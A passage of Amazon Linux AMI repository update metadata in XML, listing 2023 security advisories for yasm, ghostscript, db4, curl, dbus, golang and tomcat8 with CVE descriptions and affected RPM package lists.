arch="i686"><filename>Packages/sssd-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.16.4-21.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1724</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1724: medium priority package update for yasm</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33459:
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in nasm_parser_directive() in modules/parsers/nasm/nasm-parse.c.
CVE-2021-33454:
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in yasm_expr_get_intnum() in libyasm/expr.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33454" title="" id="CVE-2021-33454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33459" title="" id="CVE-2021-33459" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="yasm-devel" version="1.2.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/yasm-devel-1.2.0-1.5.amzn1.x86_64.rpm</filename></package><package name="yasm" version="1.2.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/yasm-1.2.0-1.5.amzn1.x86_64.rpm</filename></package><package name="yasm-debuginfo" version="1.2.0" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/yasm-debuginfo-1.2.0-1.5.amzn1.x86_64.rpm</filename></package><package name="yasm-devel" version="1.2.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/yasm-devel-1.2.0-1.5.amzn1.i686.rpm</filename></package><package name="yasm" version="1.2.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/yasm-1.2.0-1.5.amzn1.i686.rpm</filename></package><package name="yasm-debuginfo" version="1.2.0" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/yasm-debuginfo-1.2.0-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1725</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1725: important priority package update for ghostscript</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-27792:
A heap-based buffer over write vulnerability was found in GhostScript's lp8000_print_page() function in gdevlp8k.c file. An attacker could trick a user to open a crafted PDF file, triggering the heap buffer overflow that could lead to memory corruption or a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27792" title="" id="CVE-2020-27792" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-devel" version="8.70" release="24.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.27.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.27.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.27.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.27.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.27.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.27.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.27.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.27.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.27.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.27.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.27.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1726</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1726: important priority package update for db4</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10140:
Postfix before 2.11.10, 3.0.x before 3.0.10, 3.1.x before 3.1.6, and 3.2.x before 3.2.2 might allow local users to gain privileges by leveraging undocumented functionality in Berkeley DB 2.x and later, related to reading settings from DB_CONFIG in the current directory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10140" title="" id="CVE-2017-10140" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="db4-devel-static" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-devel-static-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-utils" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-utils-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-devel" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-devel-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-debuginfo" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-debuginfo-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-tcl" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-tcl-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-java" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-java-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-cxx" version="4.7.25" release="22.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/db4-cxx-4.7.25-22.13.amzn1.x86_64.rpm</filename></package><package name="db4-debuginfo" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-debuginfo-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-cxx" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-cxx-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-devel-static" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-devel-static-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-utils" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-utils-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-devel" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-devel-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-tcl" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-tcl-4.7.25-22.13.amzn1.i686.rpm</filename></package><package name="db4-java" version="4.7.25" release="22.13.amzn1" epoch="0" arch="i686"><filename>Packages/db4-java-4.7.25-22.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1727</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1727: medium priority package update for curl</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-27536:
The curl advisory describes this issue as follows:
libcurl would reuse a previously created connection even when the GSS delegation (CURLOPT_GSSAPI_DELEGATION) option had been changed that could have changed the user's permissions in a second transfer.
libcurl keeps previously used connections in a connection pool for subsequent transfers to reuse if one of them matches the setup. However, this GSS delegation setting was left out from the configuration match checks, making them match too easily, affecting krb5/kerberos/negotiate/GSSAPI transfers.
CVE-2023-27535:
The curl advisory describes this issue as follows:
libcurl would reuse a previously created FTP connection even when one or more options had been changed that could have made the effective user a very different one, thus leading to the doing the second transfer with wrong credentials.
CVE-2023-27533:
The curl advisory describes this issue as follows:
curl supports communicating using the TELNET protocol and as a part of this it offers users to pass on user name and "telnet options" for the server negotiation.
Due to lack of proper input scrubbing and without it being the documented functionality, curl would pass on user name and telnet options to the server as provided. This could allow users to pass in carefully crafted content that pass on content or do option negotiation without the application intending to do so. In particular if an application for example allows users to provide the data or parts of the data.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27533" title="" id="CVE-2023-27533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27535" title="" id="CVE-2023-27535" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27536" title="" id="CVE-2023-27536" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.61.1" release="12.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.105.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.105.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.105.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.105.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.105.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.105.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.105.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.105.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.105.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.105.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.105.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.105.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1729</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1729: medium priority package update for curl</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-27534:
The curl advisory describes this issue as follows:
curl supports SFTP transfers. curl's SFTP implementation offers a special feature in the path component of URLs: a tilde (~) character as the first path element in the path to denotes a path relative to the user's home directory. This is supported because of wording in the once proposed to-become RFC draft that was to dictate how SFTP URLs work.
Due to a bug, the handling of the tilde in SFTP path did however not only replace it when it is used stand-alone as the first path element but also wrongly when used as a mere prefix in the first element.
Using a path like /~2/foo when accessing a server using the user dan (with home directory /home/dan) would then quite surprisingly access the file /home/dan2/foo.
This can be taken advantage of to circumvent filtering or worse.
CVE-2023-23916:
curl: HTTP multi-header compression denial of service
CVE-2022-43552:
A vulnerability was found in curl. In this issue, curl can be asked to tunnel all protocols virtually it supports through an HTTP proxy. HTTP proxies can deny these tunnel operations using an appropriate HTTP error response code. When getting denied to tunnel the specific SMB or TELNET protocols, curl can use a heap-allocated struct after it has been freed and shut down the code path in its transfer.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43552" title="" id="CVE-2022-43552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23916" title="" id="CVE-2023-23916" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27534" title="" id="CVE-2023-27534" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.61.1" release="12.104.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.104.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.104.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.104.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.104.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.104.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.104.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.104.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.104.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.104.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.104.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.104.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.104.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.104.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.104.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.104.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1730</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1730: medium priority package update for dbus</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42012:
An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.
CVE-2022-42011:
An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message where an array length is inconsistent with the size of the element type.
CVE-2022-42010:
An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message with certain invalid type signatures.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42010" title="" id="CVE-2022-42010" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42011" title="" id="CVE-2022-42011" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42012" title="" id="CVE-2022-42012" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dbus" version="1.6.12" release="14.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-1.6.12-14.31.amzn1.x86_64.rpm</filename></package><package name="dbus-doc" version="1.6.12" release="14.31.amzn1" epoch="1" arch="noarch"><filename>Packages/dbus-doc-1.6.12-14.31.amzn1.noarch.rpm</filename></package><package name="dbus-libs" version="1.6.12" release="14.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-libs-1.6.12-14.31.amzn1.x86_64.rpm</filename></package><package name="dbus-devel" version="1.6.12" release="14.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-devel-1.6.12-14.31.amzn1.x86_64.rpm</filename></package><package name="dbus-debuginfo" version="1.6.12" release="14.31.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-debuginfo-1.6.12-14.31.amzn1.x86_64.rpm</filename></package><package name="dbus" version="1.6.12" release="14.31.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-1.6.12-14.31.amzn1.i686.rpm</filename></package><package name="dbus-devel" version="1.6.12" release="14.31.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-devel-1.6.12-14.31.amzn1.i686.rpm</filename></package><package name="dbus-libs" version="1.6.12" release="14.31.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-libs-1.6.12-14.31.amzn1.i686.rpm</filename></package><package name="dbus-debuginfo" version="1.6.12" release="14.31.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-debuginfo-1.6.12-14.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1731</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1731: important priority package update for golang</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24538:
Templates did not properly consider backticks (`) as Javascript string delimiters, and as such did
not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template
contained a Go template action within a Javascript template literal, the contents of the action could
be used to terminate the literal, injecting arbitrary Javascript code into the Go template.
CVE-2023-24537:
Calling any of the Parse functions on Go source code which contains //line directives with very large line numbers can cause an infinite loop due to integer overflow.
CVE-2023-24536:
Multipart form parsing can consume large amounts of CPU and memory when processing form inputs containing very large numbers of parts. This stems from several causes: 1. mime/multipart.Reader.ReadForm limits the total memory a parsed multipart form can consume. ReadForm can undercount the amount of memory consumed, leading it to accept larger inputs than intended. 2. Limiting total memory does not account for increased pressure on the garbage collector from large numbers of small allocations in forms with many parts. 3. ReadForm can allocate a large number of short-lived buffers, further increasing pressure on the garbage collector. The combination of these factors can permit an attacker to cause an program that parses multipart forms to consume large amounts of CPU and memory, potentially resulting in a denial of service. This affects programs that use mime/multipart.Reader.ReadForm, as well as form parsing in the net/http package with the Request methods FormFile, FormValue, ParseMultipartForm, and PostFormValue. With fix, ReadForm now does a better job of estimating the memory consumption of parsed forms, and performs many fewer short-lived allocations. In addition, the fixed mime/multipart.Reader imposes the following limits on the size of parsed forms: 1. Forms parsed with ReadForm may contain no more than 1000 parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxparts=. 2. Form parts parsed with NextPart and NextRawPart may contain no more than 10,000 header fields. In addition, forms parsed with ReadForm may contain no more than 10,000 header fields across all parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxheaders=.
CVE-2023-24534:
HTTP and MIME header parsing could allocate large amounts of memory, even when parsing small inputs.
Certain unusual patterns of input data could cause the common function used to parse HTTP and MIME headers to allocate substantially more memory than required to hold the parsed headers. An attacker can exploit this behavior to cause an HTTP server to allocate large amounts of memory from a small request, potentially leading to memory exhaustion and a denial of service.
CVE-2023-24532:
The ScalarMult and ScalarBaseMult methods of the P256 Curve may return an incorrect result if called with some specific unreduced scalars (a scalar larger than the order of the curve). This does not impact usages of crypto/ecdsa or crypto/ecdh.
CVE-2022-41725:
Golang: net/http, mime/multipart: denial of service from excessive resource consumption (https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E)
CVE-2022-41724:
RESERVED
NOTE: https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
CVE-2022-41722:
The Go project has described this issue as follows:
"On Windows, the filepath.Clean function could transform an invalid path such as a/../c:/b into the valid path c:\b. This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack. The filepath.Clean function will now transform this path into the relative (but still invalid) path .\c:\b."
CVE-2022-41717:
An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.
CVE-2022-32189:
An uncontrolled resource consumption flaw was found in Golang math/big. A too-short encoded message can cause a panic in Float.GobDecode and Rat.GobDecode in math/big in Go, potentially allowing an attacker to create a denial of service, impacting availability.
CVE-2022-30634:
Infinite loop in Read in crypto/rand before Go 1.17.11 and Go 1.18.3 on Windows allows attacker to cause an indefinite hang by passing a buffer larger than 1 << 32 - 1 bytes.
CVE-2022-30580:
Code injection in Cmd.Start in os/exec before Go 1.17.11 and Go 1.18.3 allows execution of any binaries in the working directory named either "..com" or "..exe" by calling Cmd.Run, Cmd.Start, Cmd.Output, or Cmd.CombinedOutput when Cmd.Path is unset.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30580" title="" id="CVE-2022-30580" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30634" title="" id="CVE-2022-30634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189" title="" id="CVE-2022-32189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717" title="" id="CVE-2022-41717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41722" title="" id="CVE-2022-41722" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41724" title="" id="CVE-2022-41724" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41725" title="" id="CVE-2022-41725" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24532" title="" id="CVE-2023-24532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24534" title="" id="CVE-2023-24534" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24536" title="" id="CVE-2023-24536" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24537" title="" id="CVE-2023-24537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24538" title="" id="CVE-2023-24538" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.18.6" release="1.43.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.18.6-1.43.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.18.6" release="1.43.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.18.6-1.43.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.18.6-1.43.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.18.6" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.18.6-1.43.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.18.6-1.43.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.18.6" release="1.43.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.18.6-1.43.amzn1.noarch.rpm</filename></package><package name="golang" version="1.18.6" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.18.6-1.43.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.18.6" release="1.43.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.18.6-1.43.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.18.6-1.43.amzn1.i686.rpm</filename></package><package name="golang" version="1.18.6" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.18.6-1.43.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.18.6-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1732</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1732: important priority package update for tomcat8</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28708:
When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.
CVE-2021-43980:
The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43980" title="" id="CVE-2021-43980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28708" title="" id="CVE-2023-28708" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-javadoc" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.87" release="1.92.amzn1" epoch="0" 